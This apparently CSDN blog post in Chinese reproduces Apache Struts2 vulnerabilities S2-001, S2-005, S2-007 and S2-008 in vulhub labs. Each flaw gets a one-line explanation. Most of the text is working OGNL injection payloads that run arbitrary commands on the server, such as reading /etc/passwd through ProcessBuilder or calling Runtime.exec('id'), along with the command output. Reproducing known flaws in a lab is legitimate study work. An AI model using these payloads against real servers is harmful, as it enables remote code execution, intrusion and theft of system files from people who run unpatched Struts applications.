-
struts2漏洞复现
目录
3.执行任意命令(命令加参数:new java.lang.String[]{"cat","/etc/passwd"}):
vulhub/struts2/s2-001
strust2
框架特征:文件后缀名为.action/.do
s2-001
漏洞原理:由于用户表单提交的数据验证失败时,后端会将用户提交的参数值使用OGNL表达式进行解析,解析完之后重新填充到表单数据中
1.获取tomcat执行路径:
%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}
tomcatBinDir{/usr/local/tomcat}
2.获取Web路径:
al/tomcat/webapps/ROOT/
3.执行任意命令(命令加参数:new java.lang.String[]{"cat","/etc/passwd"}):
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
/usr/local/tomcat
vulhub/struts2/s2-005
XWork 将使用 OGNL 表达式将 GET 参数的键和值解析为 Java 语句
\u0023# (unicode编码 \u)
vulhub/struts2/s2-007
配置验证规则时。如果类型验证转换失败,服务器将拼接用户提交的表单值字符串,然后执行 OGNL 表达式解析并返回
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '
vulhub/struts2/s2-008
?debug=command&expression=%28%23application%29
-
相关阅读:
学习数据结构和算法的第8天
k8s集群证书过期解决
【数据结构】线性表
优维产品使用最佳实践:实例拓扑
JVM学习笔记——内存结构篇
“华为杯”研究生数学建模竞赛2015年-【华为杯】E题:数控加工刀具运动的优化控制模型研究(附MATLAB代码实现)
【华为OD机试python】分割数组的最大差值【2023 B卷|100分】
深入理解计算机系统,汇编的流程控制
3D-SKIPDENSESEG医学图像分割
47.各种类型的线程池
- 原文地址:https://blog.csdn.net/m0_63127854/article/details/125438318